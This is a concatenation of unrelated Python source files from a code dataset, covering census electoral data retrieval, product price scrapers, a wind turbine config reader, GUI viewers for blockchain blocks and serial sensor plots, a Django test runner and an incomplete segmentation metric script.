'B3'\nEIGHTEEN_TO_TWENTY_NINE = 'B5'\nTHIRTY_TO_FORTY_FOUR = 'B6'\nFORTY_FIVE_TO_SIXTY_FOUR = 'B7'\nSIXTY_FIVE_AND_OVER = 'B8'\nMALE = 'B10'\nFEMALE = 'B10'\nWHITE = 'B13'\nBLACK = 'B14'\nNATIVE_AMERICAN = 'B15'\nASIAN = 'B16'\nPACIFIC_ISLANDER = 'B17'\nOTHER_RACE = 'B18'\nMULTI_RACIAL = 'B19'\nHISPANIC = 'B21'\nNOT_HISPANIC = 'B22'\nWHITE_NOT_HISPANIC = 'B23'\nCITIZENS_25_AND_OLDER = 'B24'\nBACHELORS_OR_HIGHER = 'B25'\nDETERMINED_POVERTY_STATUS = 'B26'\nBELOW_POVERTY_LEVEL = 'B27'\nHOUSEHOLDS = 'B28'\nHUNDRED_K_HOUSEHOLDS = 'B29'\n\ndemos = {\n 'eighteenToTwentyNine': EIGHTEEN_TO_TWENTY_NINE,\n 'thirtyToFortyFour': THIRTY_TO_FORTY_FOUR,\n 'fortyFiveToSixtyFour': FORTY_FIVE_TO_SIXTY_FOUR,\n 'sixtyFiveAndOver': SIXTY_FIVE_AND_OVER,\n 'male': MALE,\n 'female': FEMALE,\n 'white': WHITE,\n 'black': BLACK,\n 'nativeAmerican': NATIVE_AMERICAN,\n 'asian': ASIAN,\n 'pacificIslander': PACIFIC_ISLANDER,\n 'otherRace': OTHER_RACE,\n 'multiRacial': MULTI_RACIAL,\n}\n\n# urls found at: http://www.census.gov/data/tables/time-series/demo/voting-and-registration/electorate-profiles-2016.html\nURL = 'http://www2.census.gov/programs-surveys/demo/tables/voting/{}.xlsx'\n\ndef write_object(f, name, o):\n f.write('export const {} = '.format(name))\n f.write(json.dumps(o, indent=2, sort_keys=True))\n f.write(';\\n')\n\nstates = {}\nfor state, e_votes in E_VOTES.items():\n print(state)\n fn = os.path.join(DATA_DIR, state+'.xlsx')\n\n if not os.path.exists(fn):\n url = URL.format(state.replace(' ', ''))\n r = requests.get(url)\n with open(fn, 'wb') as f:\n f.write(r.content)\n\n wb = load_workbook(fn)\n ws = wb[wb.sheetnames[0]]\n\n states[state] = {\n 'name': state,\n 'elVotes': e_votes,\n 'votingAgePop': ws[VOTING_AGE_POP].value,\n 'demos': {}\n }\n for (demo_name, demo_key) in demos.items():\n pop = ws[demo_key].value\n states[state]['demos'][demo_name] = {\n demo_name+'Pop': pop,\n demo_name+'Ratio': pop / states[state]['votingAgePop']\n }\n\nelVotes = sum([state['elVotes'] for state in states.values()])\nvotingAgePop = sum([state['votingAgePop'] for state in states.values()])\nnation = {\n 'name': 'United States',\n 'elVotes': elVotes,\n 'votingAgePop': votingAgePop,\n 'demos': {}\n}\n\nfor state in states.values():\n state['elVoteRatio'] = state['elVotes'] / nation['elVotes']\n state['elVotePercent'] = state['elVoteRatio'] * 100\n state['votes'] = state['elVoteRatio'] * nation['votingAgePop']\n state['votesPerPerson'] = state['votes'] / state['votingAgePop']\n for (demo_name, demo_key) in demos.items():\n state_demo = state['demos'][demo_name]\n state_demo[demo_name+'Votes'] = state_demo[demo_name+'Ratio'] * state['votes']\n\nfor (demo_name, demo_key) in demos.items():\n total_demo_pop = sum([state['demos'][demo_name][demo_name+'Pop'] for state in states.values()])\n total_demo_votes = sum([state['demos'][demo_name][demo_name+'Votes'] for state in states.values()])\n nation['demos'][demo_name] = { 'votesPerPerson': total_demo_votes / total_demo_pop }\n\nwith open(JS_FILE, 'w') as f:\n write_object(f, 'states', states)\n write_object(f, 'nation', nation)\n","repo_name":"ctcutler/electoral","sub_path":"retrieve_and_clean.py","file_name":"retrieve_and_clean.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43814215482","text":"from __future__ import absolute_import, division, print_function, \\\n unicode_literals\nimport re\n\n\n_CAPS_TO_UNDERSCORE_REGEX = re.compile('(.)([A-Z][a-z]+)')\n_NUMBERS_TO_UNDERSCORE_REGEX = re.compile('([a-z0-9])([A-Z])')\n\n\ndef to_underscore(name):\n s1 = _CAPS_TO_UNDERSCORE_REGEX.sub(r'\\1_\\2', name)\n return _NUMBERS_TO_UNDERSCORE_REGEX.sub(r'\\1_\\2', s1).lower()\n\n\ndef from_underscore(name):\n\n if not name:\n return ''\n\n def camelcase_func_it():\n yield 'lower'\n while True:\n yield 'capitalize'\n\n c = camelcase_func_it()\n return ''.join(getattr(x, next(c))() if x else '_' for x in name.split(\"_\"))\n","repo_name":"splitio/python-api","sub_path":"splitapiclient/util/camelcase.py","file_name":"camelcase.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7102365253","text":"import pandas as pd \nimport sys\n\n\n\nif __name__ == \"__main__\":\n\tinput_file = sys.argv[1]\n\tsent_df = pd.read_csv(input_file)\n\tind_df = pd.read_csv(\"trans_sent_num.csv\", encoding = \"ISO-8859-1\")\n\tind_df = ind_df.rename(columns = {'name':'ID'})\n\tabuse_df = pd.DataFrame(columns = ['ID', 'abuse'])\n\n\tfull = pd.read_csv(\"transcript_fullset.csv\")\n\n\tID = 1\n\tabuse_count = 0\n\tsent_count = 0\n\tfor index, row in sent_df.iterrows():\n\t\tif int(row['ID']) == ID:\n\t\t\tsent_count += 1\n\t\t\tabuse_count += row[\"abuse\"]\n\t\telse:\n\t\t\tabuse_df.set_value(ID, 'abuse', abuse_count/sent_count)\n\t\t\tabuse_df.set_value(ID, 'ID', ID)\n\t\t\tsent_count = 1\n\t\t\tabuse_count = 0\n\t\t\tID = int(row[\"ID\"])\n\n\n\tresult_df = pd.merge(ind_df, abuse_df, on=['ID'])\n\n\tfinal_df = pd.merge(full, result_df, on=['ID'] )\n\n\tfinal_df.to_csv('QTA_final_data.csv')","repo_name":"cernhofer/Residential_School_Research","sub_path":"construct_df.py","file_name":"construct_df.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32813826500","text":"import re\nimport numpy as np\nimport string\n\n\nclass Turbine(object):\n \"\"\"\n Tubine class initialization: read the turbine parameters given the turbine name and directory\n\n :param str turbineName: turbine name [turbine name, windTunnel, precursor, noTurbine]\n :param str turbineDir: turbine directory path\n :param str turbineFileName: turbine file name\n \"\"\"\n\n def __init__(self, turbineName, turbineDir, turbineFileName):\n self.turbineName = turbineName\n\n if turbineName == 'windTunnel' or turbineName == 'precursor' or turbineName == 'noTurbine':\n self.turbineFileName = None\n self.turbineDir = turbineDir\n else:\n if turbineDir is None:\n self.turbineDir = \"./\"\n else:\n self.turbineDir = turbineDir\n self.turbinePropDir = self.turbineDir + '/constant/turbineProperties/'\n self.turbineArrayProp = self.turbineDir + '/constant/turbineArrayProperties'\n if turbineFileName is None:\n self.turbineFileName = 'DTU10MW_POLIMI_WTM'\n else:\n self.turbineFileName = turbineFileName\n\n # Read turbine properties\n with open(self.turbinePropDir + self.turbineFileName, \"r\") as turbProp:\n flag = False\n blade_data = []\n numeric_pattern = '[+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d+ '\n for line in turbProp:\n if 'TipRad' in line:\n self.rotor_R = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.rotor_D = 2 * self.rotor_R\n elif 'HubRad' in line:\n self.hub_R = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'TowerHt' in line:\n self.tower_H = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'BladeData' in line:\n flag = True\n elif 'TowerData' in line:\n flag = False\n if flag:\n blade_data.append(re.findall(numeric_pattern, line))\n # remove empty elements from blade_data\n blade_data = list(filter(None, blade_data))\n # split sublists\n for i in range(0, len(blade_data)):\n dummy = [el.split() for el in blade_data[i]]\n blade_data[i] = dummy\n # convert to numpy array\n blade_data = np.array(blade_data, dtype=float).reshape(len(blade_data), 6)\n self.blade_r = blade_data[:, 0]\n self.blade_c = blade_data[:, 1]\n self.blade_twist = blade_data[:, 2]\n # self.nacelle_H = self.tower_H+self.offsetNacelle\n\n with open(self.turbineArrayProp, \"r\") as turbArr:\n for line in turbArr:\n if 'baseLocation' in line:\n self.turbX0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.turbY0 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.turbZ0 = float(re.findall('\\d+\\.?\\d*', line)[2])\n self.nacelle_H = self.tower_H + self.turbZ0\n elif 'numBladePoints' in line:\n self.numBladePoints = int(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'numNacellePoints' in line:\n self.numNacellePoints = int(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'numTowerPoints' in line:\n self.numTowerPoints = int(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'bladeForceProjectionType' in line:\n self.bladeForceProjectionType = line.split()[1].translate(\n str.maketrans('', '', string.punctuation))\n elif 'bladeEpsilon' in line:\n self.bladeepsilon0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.bladeepsilon1 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.bladeepsilon2 = float(re.findall('\\d+\\.?\\d*', line)[2])\n elif 'nacelleEpsilon' in line:\n self.nacelleepsilon0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.nacelleepsilon1 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.nacelleepsilon2 = float(re.findall('\\d+\\.?\\d*', line)[2])\n elif 'towerEpsilon' in line:\n self.towerepsilon0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.towerepsilon1 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.towerepsilon2 = float(re.findall('\\d+\\.?\\d*', line)[2])\n\n with open(self.turbineDir + '/setUp', \"r\") as setUp:\n for line in setUp:\n if 'xMin' in line:\n self.xMin = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'yMin' in line:\n self.yMin = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'zMin' in line:\n self.zMin = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'xMax' in line:\n self.xMax = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'yMax' in line:\n self.yMax = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'zMax' in line:\n self.zMax = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'U0Mag' in line:\n self.U0Mag = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.XDomain = self.xMax - self.xMin\n self.YDomain = self.yMax - self.yMin\n self.ZDomain = self.zMax - self.zMin\n\n","repo_name":"GiordiR/pySOWFA","sub_path":"pySOWFA/Turbine.py","file_name":"Turbine.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6625874787","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom lxml import html\nfrom urllib import parse\nimport math\nimport json\n\n\nclass Scraper:\n\n def __init__(self, URL):\n self.current_price = None\n self.actual_price = None\n self.deal_price = None\n self.discount = None\n self.URL = URL\n self.HEADERS = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'\n }\n\n def get_url_from_user(self):\n try:\n parsed_url = parse.urlsplit(self.URL)\n response = requests.get(self.URL, headers=self.HEADERS)\n html_response = BeautifulSoup(response.content, 'lxml')\n if parsed_url.netloc == 'www.amazon.com' or parsed_url.netloc == 'www.amazon.in':\n return self.scrap_amazon(html_response)\n elif parsed_url.netloc == 'www.flipkart.com':\n return self.scrap_flipkart(html_response)\n elif parsed_url.netloc == 'www.snapdeal.com':\n return self.scrap_snapdeal(html_response)\n else:\n print('None of the above')\n except AttributeError as error:\n print(error)\n\n def scrap_amazon(self, html_response):\n product_image = None\n # get product image\n try:\n product_image = html_response.select_one('img#landingImage')[\n 'data-a-dynamic-image']\n product_image = list(json.loads(product_image).keys())[0]\n except:\n product_image = 'NA'\n # get product name\n try:\n product_name = html_response.select_one('span#productTitle').get_text().strip()\n except:\n product_name = 'NA'\n # get actual price\n try:\n self.actual_price = html_response.select_one(\n 'span.priceBlockStrikePriceString.a-text-strike').get_text()\n self.actual_price = float(self.actual_price.strip().replace(\n '₹', '').replace(',', '').replace('$', ''))\n except AttributeError as error:\n self.actual_price = 'NA'\n print(self.actual_price)\n # get current price\n try:\n self.current_price = html_response.select_one(\n 'span#priceblock_ourprice').get_text()\n self.current_price = float(self.current_price.strip().replace(\n '₹', '').replace(',', '').replace('$', ''))\n except AttributeError as error:\n self.current_price = 'NA'\n # get deal price\n try:\n self.deal_price = html_response.select_one(\n 'span#priceblock_dealprice').get_text()\n self.deal_price = float(self.deal_price.strip().replace(\n '₹', '').replace(',', '').replace('$', ''))\n except AttributeError as error:\n self.deal_price = 'NA'\n if self.current_price == 'NA' and self.deal_price != 'NA':\n self.current_price = self.deal_price\n elif self.current_price == 'NA' and self.deal_price == 'NA':\n self.current_price = self.actual_price\n elif self.actual_price == 'NA' and self.current_price != 'NA':\n self.actual_price = self.current_price\n discount = math.floor(\n ((self.actual_price - self.current_price) / self.actual_price) * 100)\n return {\n 'product_image': product_image,\n 'product_name': product_name,\n 'actual_price': self.actual_price,\n 'current_price': self.current_price,\n 'discount': discount\n }\n\n def scrap_flipkart(self, html_response):\n # get produc image\n product_image = 'https://www.wileyindia.com/pub/static/frontend/Magento/luma/en_US/images/Flipkart.jpg'\n # get product image\n try:\n product_name = html_response.select_one('span._35KyD6').get_text().strip()\n except:\n product_name = 'NA'\n # get actual price\n try:\n self.actual_price = html_response.select_one(\n 'div._3auQ3N._1POkHg').get_text().strip()\n self.actual_price = float(self.actual_price.replace('₹', '').replace(',', ''))\n except AttributeError as error:\n self.actual_price = 'NA'\n # get current price\n try:\n self.current_price = html_response.select_one(\n 'div._1vC4OE._3qQ9m1').get_text().strip()\n self.current_price = float(self.current_price.replace('₹', '').replace(',', ''))\n except AttributeError as error:\n self.current_price = 'NA'\n if self.actual_price == 'NA' and self.current_price != 'NA':\n self.actual_price = self.current_price\n elif self.actual_price != 'NA' and self.current_price == 'NA':\n self.current_price = self.actual_price\n discount = math.floor(((self.actual_price - self.current_price)/self.actual_price) * 100)\n return {\n 'product_image': product_image,\n 'product_name': product_name,\n 'actual_price': self.actual_price,\n 'current_price': self.current_price,\n 'discount': discount\n }\n\n def scrap_snapdeal(self, html_response):\n # get product image\n try:\n img_container = html_response.select_one('ul#bx-slider-left-image-panel')\n product_image = img_container.select('img.cloudzoom')[0]['src']\n except:\n product_image = 'NA'\n # get product name\n try:\n product_name = html_response.select_one('h1.pdp-e-i-head').get_text().strip()\n except:\n product_name = 'NA'\n # get actual price\n try:\n self.actual_price = html_response.select_one(\n 'div.pdpCutPrice').get_text().strip()\n self.actual_price = float(self.actual_price[9:15].replace(',', ''))\n except AttributeError as error:\n self.actual_price = 'NA'\n # get current price\n try:\n for sub_div in html_response.select('span.pdp-final-price'):\n self.current_price = sub_div.find(\n 'span', {'class': 'payBlkBig'}).get_text().strip()\n self.current_price = float(self.current_price)\n except AttributeError as error:\n self.current_price = 'NA'\n if self.actual_price == 'NA' and self.current_price != 'NA':\n self.actual_price = self.current_price\n elif self.actual_price != 'NA' and self.current_price == 'NA':\n self.current_price = self.actual_price\n discount = math.floor(((self.actual_price - self.current_price)/self.actual_price) * 100)\n return {\n 'product_image': product_image,\n 'product_name': product_name,\n 'actual_price': self.actual_price,\n 'current_price': self.current_price,\n 'discount': discount\n }\n\n\nif __name__ == '__main__':\n scraper = Scraper()\n scraper.get_url_from_user()\n","repo_name":"bhargavkuchipudi0/web_scraper","sub_path":"scrapers/scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":7039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41393471026","text":"import wx\nimport wx.lib.agw.hyperlink as hyperlink\n\nclass BlockView(wx.Panel):\n def __init__(self, parent=None):\n wx.Panel.__init__(self, parent)\n #Block\n txtctrl_style = wx.TE_READONLY|wx.BORDER_SIMPLE #|wx.TE_RIGHT\n txtctrl_color = (196,196,196)\n font_large = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)\n font_mono = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL)\n self.block_label = wx.StaticText(self, -1, \"Block\", size=(350,30))\n self.block_label.SetFont(font_large)\n self.hash_label = wx.StaticText(self, -1, \"Hash:\")\n self.hash_linkctrl = hyperlink.HyperLinkCtrl(self, wx.ID_ANY, \"\")\n self.previous_block_label = wx.StaticText(self, -1, \"Previous block:\")\n self.previous_block_linkctrl = hyperlink.HyperLinkCtrl(self, wx.ID_ANY, \"\") \n self.next_block_label = wx.StaticText(self, -1, \"Next block:\")\n self.next_block_linkctrl = hyperlink.HyperLinkCtrl(self, wx.ID_ANY, \"\") \n self.time_label = wx.StaticText(self, -1, \"Time:\")\n self.time_textctrl = wx.TextCtrl(self, -1, \"\", size=(150,-1), style=txtctrl_style)\n self.time_textctrl.SetBackgroundColour(txtctrl_color)\n self.time_textctrl.SetFont(font_mono)\n self.difficulty_label = wx.StaticText(self, -1, \"Difficulty:\")\n self.difficulty_textctrl = wx.TextCtrl(self, -1, \"\", size=(150,-1), style=txtctrl_style)\n self.difficulty_textctrl.SetBackgroundColour(txtctrl_color)\n self.difficulty_textctrl.SetFont(font_mono)\n self.merkle_label = wx.StaticText(self, -1, \"Merkle root:\")\n self.merkle_textctrl = wx.TextCtrl(self, -1, \"\", size=(390,-1), style=txtctrl_style)\n self.merkle_textctrl.SetBackgroundColour(txtctrl_color)\n self.merkle_textctrl.SetFont(font_mono)\n self.nonce_label = wx.StaticText(self, -1, \"Nonce:\")\n self.nonce_textctrl = wx.TextCtrl(self, -1, \"\", size=(150,-1), style=txtctrl_style)\n self.nonce_textctrl.SetBackgroundColour(txtctrl_color)\n self.nonce_textctrl.SetFont(font_mono)\n #Transactions\n self.transactions_label = wx.StaticText(self, -1, \"Transactions\", size=(350,-1))\n self.transactions_label.SetFont(font_large)\n \n self.transactions_listctrl = wx.ListCtrl(self,style=wx.LC_REPORT, size=(400,100))\n \n self.transactions_listctrl.InsertColumn(0, \"Transaction\")\n self.transactions_listctrl.SetColumnWidth(0, 240)\n self.transactions_listctrl.InsertColumn(1, \"Amount\")\n self.transactions_listctrl.InsertColumn(2, \"Fee\")\n self.transactions_listctrl.InsertColumn(3, \"Type\")\n \n \n self.sizer = wx.BoxSizer(wx.VERTICAL)\n formsizer = wx.FlexGridSizer(7, 2, vgap=2)\n formsizer.Add(self.hash_label, 0)\n formsizer.Add(self.hash_linkctrl, 0, wx.EXPAND)\n formsizer.Add(self.previous_block_label, 0)\n formsizer.Add(self.previous_block_linkctrl, 0, wx.EXPAND)\n formsizer.Add(self.next_block_label)\n formsizer.Add(self.next_block_linkctrl, 0,wx.EXPAND)\n formsizer.Add(self.time_label, 0)\n formsizer.Add(self.time_textctrl, 0)\n formsizer.Add(self.difficulty_label, 0)\n formsizer.Add(self.difficulty_textctrl, 0)\n formsizer.Add(self.merkle_label, 0)\n formsizer.Add(self.merkle_textctrl, 0, wx.EXPAND)\n formsizer.Add(self.nonce_label, 0)\n formsizer.Add(self.nonce_textctrl, 0)\n formsizer.AddGrowableCol(1)\n \n \"\"\"\n tx_table = wx.FlexGridSizer(20, 5, vgap=2)\n tx_table.Add(self.thlabel_txtable)\n tx_table.Add(self.thlabel_amount)\n tx_table.Add(self.thlabel_fee)\n tx_table.Add(self.thlabel_from)\n tx_table.Add(self.thlabel_to)\n tx_table.AddGrowableCol(0)\n tx_table.AddGrowableCol(1)\n tx_table.AddGrowableCol(2)\n tx_table.AddGrowableCol(3)\n tx_table.AddGrowableCol(4)\"\"\"\n \n self.sizer.Add(self.block_label)\n \n self.sizer.Add(formsizer, 0, wx.EXPAND)\n self.sizer.Add(self.transactions_label)\n self.sizer.Add(self.transactions_listctrl, 1, wx.EXPAND)\n \n \n self.bestsize = (600,25)\n self.SetSize(self.GetBestSize())\n self.SetSizer(self.sizer)\n #Events\n self.hash_linkctrl.Bind(hyperlink.EVT_HYPERLINK_LEFT, self.on_click_hash)\n self.hash_linkctrl.AutoBrowse(False)\n self.previous_block_linkctrl.Bind(hyperlink.EVT_HYPERLINK_LEFT, self.on_click_prev)\n self.previous_block_linkctrl.AutoBrowse(False)\n self.next_block_linkctrl.Bind(hyperlink.EVT_HYPERLINK_LEFT, self.on_click_next)\n self.next_block_linkctrl.AutoBrowse(False)\n \n def on_click_hash(self, event):\n wx.MessageBox(\"You clicked hash\")\n\n def on_click_prev(self, event):\n wx.MessageBox(\"You clicked prev\")\n\n def on_click_next(self, event):\n wx.MessageBox(\"You clicked next\")\n\n\n def set_hash(self, str):\n self.hash_linkctrl.SetLabel(str)\n\n def set_previous_block(self, str):\n self.previous_block_linkctrl.SetLabel(str)\n\n def set_next_block(self, str):\n self.next_block_linkctrl.SetLabel(str)\n\n def set_time(self, str):\n self.time_textctrl.SetValue(str)\n\n def set_difficulty(self, str):\n self.difficulty_textctrl.SetValue(str)\n\n def set_merkle(self, str):\n self.merkle_textctrl.SetValue(str)\n\n def set_nonce(self, str):\n self.nonce_textctrl.SetValue(str)\n\n def add_transaction(self, hash, amount, fee, type):\n index = self.transactions_listctrl.InsertStringItem(self.transactions_listctrl.GetItemCount(),hash)\n self.transactions_listctrl.SetStringItem(index, 1, amount)\n self.transactions_listctrl.SetStringItem(index, 2, fee)\n self.transactions_listctrl.SetStringItem(index, 3, type)\n \n \nif __name__ == '__main__':\n app = wx.App(False)\n frame = wx.Frame(None, size=(500, 600))\n BlockView(frame)\n\n\n frame.Show()\n app.MainLoop()","repo_name":"sirk390/coinpy","sub_path":"coinpy-client/src/coinpy_client/view/blockchain/block_view.py","file_name":"block_view.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"24265156962","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nfrom pyqtgraph import PlotWidget, plot\nfrom PyQt5.Qt import Qt\nimport pyqtgraph as pg\nimport sys \nimport os\nfrom random import randint\nimport serial.tools.list_ports\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtGui,QtCore\nimport re\n\nports = serial.tools.list_ports.comports()\nserialInst = serial.Serial()\nportsList = []\n\nfor onePort in ports:\n portsList.append(str(onePort))\n print(str(onePort))\n\nval = input(\"Select Port: COM\")\n\nfor x in range(0,len(portsList)):\n if portsList[x].startswith(\"COM\" + str(val)):\n portVar = \"COM\" + str(val)\n print(portVar)\n\nserialInst.baudrate = 115200\nserialInst.port = portVar\nserialInst.open()\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n rotation_sensor=0\n light_sensor=0\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n \n self.widget = QWidget()\n layout = QGridLayout()\n self.widget.setLayout(layout)\n\n \n self.graphWidget_light = pg.PlotWidget()\n self.graphWidget_rotation = pg.PlotWidget()\n \n layout.addWidget(self.graphWidget_light, 0, 0)\n layout.addWidget(self.graphWidget_rotation, 0, 1)\n\n self.setCentralWidget(self.widget)\n self.setWindowTitle(\"Setting threshold to light sensor\")\n\n self.xr = list(range(100)) # 100 time points\n self.yr = [30 for _ in range(100)] # 100 data points\n \n self.xl = list(range(100)) # 100 time points\n self.yl = [30 for _ in range(100)] # 100 data points\n\n self.graphWidget_rotation.setBackground('k')\n self.graphWidget_light.setBackground('k')\n\n color1 = pg.mkPen(color=(0, 255, 255))\n self.data_line = self.graphWidget_rotation.plot(self.xr, self.yr, pen=color1)\n\n color2 = pg.mkPen(color=(255,0,0))\n self.data_line2 = self.graphWidget_light.plot(self.xl, self.yl, pen=color2)\n \n def update_plot_data_rotation(self):\n self.xr = self.xr[1:] # Remove the first y element.\n self.xr.append(self.xr[-1] + 1) # Add a new value 1 higher than the last.\n if self.rotation_sensor<6000:\n self.yr = self.yr[1:] # Remove the first \n self.yr.append(self.rotation_sensor) \n self.data_line.setData(self.xr, self.yr) # Update the data.\n \n def update_plot_data_light(self):\n self.xl = self.xl[1:] # Remove the first y element.\n self.xl.append(self.xl[-1] + 1) # Add a new value 1 higher than the last.\n\n self.yl = self.yl[1:] # Remove the first \n self.yl.append(self.light_sensor) \n if self.light_sensor>0 and self.light_sensor<2000:\n # daca e valoare mica => VERDE (0,255,0)\n color1 = pg.mkPen(color=(0,255,0)) \n self.data_line2.setData(self.xl, self.yl, pen = color1) # Update the data.\n elif self.light_sensor>2000 and self.light_sensor<4000:\n # daca e valoare mica => GALBEN (255,255,0)\n color2 = pg.mkPen(color=(255,255,0)) \n self.data_line2.setData(self.xl, self.yl, pen=color2)\n elif self.light_sensor>4000 and self.light_sensor<6000:\n # daca e valoare mica => RED (255,0,0)\n color3 = pg.mkPen(color=(255,0,0)) \n self.data_line2.setData(self.xl, self.yl, pen=color3)\n # Update the data.\n\ndef get_data_from_serial():\n global window1\n global data\n if serialInst.in_waiting:\n packet=serialInst.readline()\n \n buffer=packet.decode('utf',errors='replace').strip(\"\\n\")\n aux=buffer.split(\" \")\n if len(aux) == 3:\n if aux[1].isnumeric():\n if \"Light\" in aux[0]:\n data=aux[1]\n print(data)\n window1.light_sensor=int(data)\n \n else :\n aux=buffer.split(\" \")\n data=aux[1]\n print(data)\n window1.rotation_sensor=int(data)\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow1 = MainWindow()\nwindow1.show()\n\n\ntimer = QtCore.QTimer()\ntimer2 = QtCore.QTimer()\n\ntimer.setInterval(50)\ntimer2.setInterval(1)\ntimer2.timeout.connect(get_data_from_serial)\n\ntimer.timeout.connect(window1.update_plot_data_rotation)\ntimer.timeout.connect(window1.update_plot_data_light)\ntimer2.start()\ntimer.start()\n\nsys.exit(app.exec_())\n ","repo_name":"vred29/proiect_micro","sub_path":"pyqt/ui_micro.py","file_name":"ui_micro.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72544170086","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nos.environ['DJANGO_SETTINGS_MODULE'] = 'test_settings'\ntest_dir = os.path.dirname(__file__)\nsys.path.insert(0, test_dir)\n\nimport django\nfrom django.test.utils import get_runner\nfrom django.conf import settings\n\n\ndef runtests():\n django.setup()\n TestRunner = get_runner(settings)\n test_runner = TestRunner(verbosity=1, interactive=True)\n failures = test_runner.run_tests(\n ['quiz', 'essay', 'multichoice', 'true_false']\n )\n sys.exit(bool(failures))\n\nif __name__ == '__main__':\n runtests()\n","repo_name":"tomwalker/django_quiz","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":560,"dataset":"github-code","pt":"52"} +{"seq_id":"3409347725","text":"import torch\nimport numpy as np\nfrom utils.clustering import get_inst_masks\n\n\ndef preprocess_pred_inst(sem_pred, inst_pred, sem_label, inst_label):\n \"\"\"Convert inputs into the right format to use metric evaluation scripts.\"\"\"\n if isinstance(sem_pred, torch.Tensor):\n sem_pred = sem_pred.cpu().numpy()\n if isinstance(inst_pred, torch.Tensor):\n inst_pred = inst_pred.cpu().numpy()\n if isinstance(sem_label, torch.Tensor):\n sem_label = sem_label.cpu().numpy()\n if isinstance(inst_label, torch.Tensor):\n inst_label = inst_label.cpu().numpy()\n\n # return sem_pred.astype(np.int64), inst_pred.astype(np.int64), sem_label.astype(np.int64), inst_label.astype(np.int64)\n # Yang: change the type to be the same as defined in semantic-kitti-api\n return sem_pred.astype(np.uint32), inst_pred.astype(np.uint32), sem_label.astype(np.uint32), inst_label.astype(np.uint32)\n\n\ndef eval_average_precision_inst(inst_pred, sem_pred, sem_label, stuff_list):\n \"\"\"get thing mask\"\"\"\n # add the class 0 to stuff class, which is the unlabeled class\n stuff_unlabeled_list = stuff_list.append(0) \n\n # create the mask of semantic predictions where stuff and unlabeled classes appear, and invert it using ~\n thing_mask = ~torch.isin(sem_pred, stuff_unlabeled_list)\n\n # get the instance/semantic predictions where only thing classes exist, and length is reduced\n thing_inst_pred = inst_pred[thing_mask] # do contain 0 values\n thing_sem_pred = sem_pred[thing_mask] # do not contain 0 values\n\n \"\"\"get iou\"\"\"\n # get unique inst_ids and corresponding frequencies\n thing_inst_unique_values, frequencies = torch.unique(thing_inst_pred, return_counts=True)\n num_clusters = len(thing_inst_unique_values)\n\n # get inst_id mask\n thing_inst_masks = get_inst_masks(num_clusters, thing_inst_pred) # 0-1 float mask, cannot reduce length\n\n # get inst_id-masked semantic prediction\n id_masked_thing_sem_pred = thing_inst_masks * thing_sem_pred # dim(id_masked_thing_sem_pred) = [Number of clusters X Number of points in interest]\n\n # majority vote of semantic labels in a cluster and propogate through all points in the cluster\n majority_vote_sem_pred = id_masked_thing_sem_pred[id_masked_thing_sem_pred != 0].view(num_clusters, -1).mode(dim=-1) # [1 X Number of clusters], mode for each row\n thing_inst_sem_pred = thing_inst_masks * majority_vote_sem_pred.view(len(majority_vote_sem_pred), 1) # [Number of clusters X Number of points in interest]\n\n # get iou between thing_inst_sem_pred and thing_inst_sem_gt\n thing_inst_sem_pred = torch.sum(thing_inst_sem_pred, 0) # sum over column, as only one value exists in each column\n thing_inst_sem_label = sem_label[thing_mask]\n\n \"\"\"get confusion matrix (tp/fp/fn)\"\"\"\n\n \"\"\"get recall/precision\"\"\"\n\n 